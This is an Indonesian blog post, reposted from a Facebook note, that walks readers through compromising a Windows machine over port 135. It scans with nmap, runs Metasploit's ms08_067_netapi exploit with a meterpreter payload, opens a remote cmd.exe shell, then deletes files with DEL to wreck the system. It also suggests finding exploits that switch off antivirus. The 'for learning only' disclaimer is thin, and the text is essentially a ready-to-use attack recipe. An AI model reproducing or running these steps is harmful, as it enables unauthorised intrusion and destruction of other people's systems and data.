[Hacking] Hajar Windows lewat port 135

Standard

Assalamu’alaikum, 

Tulisan ini dibuat berdasarkan catatan asli mas Andi Susilo di Facebook nya serta telah mendapat Izin darinya untuk menulis ulang kembali. Dan sekarang catatan tersebut tidak ditemukan lagi, tidak diketahui apa sebabnya. Sebelumnya, saya ingin menyampaikan, tidak ada yang dikurangi bahkan diubah kecuali susunan paragraf dan tatanan bahasa dari salinan asli. Semua itu dilakukan untuk kemudahan dalam memahami oleh para pembaca dan tidak menghilangkan cita rasa tulisan aslinya. Dan semua yang ada dalam tulisan ini  hanya untuk belajar semata, saya sebagai pemilik blog, tidak bertanggung jawab dengan apa yang terjadi sesudah itu. Selamat menikmati.

Peralatan yg mesti dipersiapkan adalah 2 buah komputer dengan sistem operasi Distro Linux Backtrack atau Ubuntu dan Windows lalu sambungkan dengan kabel LAN, karena ini bukan belajar jahat maka kita mesti modal sendiri, jangan komputer orang lain yang di hajar, kemudian install nmap dan metasploit di komputer ber OS Linux

Berikut langkah-langkahnya :

Pertama
Jika kita menggunakan Backtrack Linux, langsung saja ketik di terminalnya

sudo apt-get install metaspoit

tapi jika kita pakai Ubuntu Linux, terpaksa kita harus add sourcelist nya backtrack di sources list nya ubuntu. Ini caranya. Jika sudah di install, sekarang coba jalankan metasploitnya. Ada 3 jenis tipe metasploit, aktifkan terminal/console lalu ketik

$msfconsole (ini buat menjalankan metasploit yang berbasis console),

$msfgui (ini buat menjalankan metasploit berbasis applikasi desktop),

$msfweb (ini buat menjalankan metasploit yg berbasis web), jadi ketika anda membuka browser, lalu di addressbarnya ketikan 127.0.0.1:5555

Silahkan pilih yang nyaman bagi anda, kalau saya pilih console/terminal.

Kedua
Berikut langkah menggunakan terminal, aktifkan terminal anda, ketikkan

$nmap ip-target ,

Seperti gambar berikut :

nmap

Lihat, port 135 nya terbuka, berarti ada harapan lanjut ke langkah selanjutnya.

Kemudian aktifkan metasploitnya, dengan cara ketik diterminal

$msfconsole

berikut screenshoot nya :

metasploit

Ketiga
Mulailah kita, melihat jenis exploit yg ada di metasploit dengan cara ketik

show exploits

tapi jika anda sudah tidak sabar karena melihat port 135 terbuka, langsung hajar, dengan mengetikkan

use windows/smb/ms08_067_netapi

Enter

show payload

Enter

ini buat melihat payload yang ada di metasploit, pilih salah satu

set payload windows/meterpreter/bind_tcp

Enter

set lhost 192.168.1.1

Enter, langkah diatas adalah memasukkan alamat ip komputer kita

set rhost 192.168.1.2

Enter, selanjutnya langkah diatas adalah memasukkan ip komputer target

exploit

Enter, selanjutnya jika muncul tulisan seperti ini

Exploit completed, but no session was created

Berarti antivirus target keren alias bagus, cari lagi exploit yang bisa menon aktifkan anti virus. Tapi kalo yg muncul

meterpreter

brati anda telah sukses, lanjut ke exploit dengan mengetikkan

execute -f cmd.exe -c -i

Enter,

jadinya seperti ini gambarnya:

meterpreter

Keempat
Lihat baris yg paling bawah, anda sudah masuk ke system32 nya windows. Sekarang saatnya menghajar windows. Gampang kok. Gunakan saja perintah

DIR

untuk melihat file-file dan folder serta perintah

DEL

untuk menghapus file/folder

coba aja ketikkan DIR, maka akan keluar nama file dan foldernya, seperti gambar ini:

DEL

Tinggal ketik DEL diiringi dengan namafile, jika anda ingin menghapusnya. Windowsnya selesai. Sekarang silahkan di patch system anda (pengguna Windows), karena ubuntu imut, lucu dan manis bisa menghajar dari belakang.

Penggunaan module exploit dengan menggunakan metasploit banyak sekali, silahkan lihat disini untuk babat server windows juga ada kok. Silahkan dipelajari bagi yang gemar dengan jaringan.

Wassalam

5 thoughts on “[Hacking] Hajar Windows lewat port 135

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s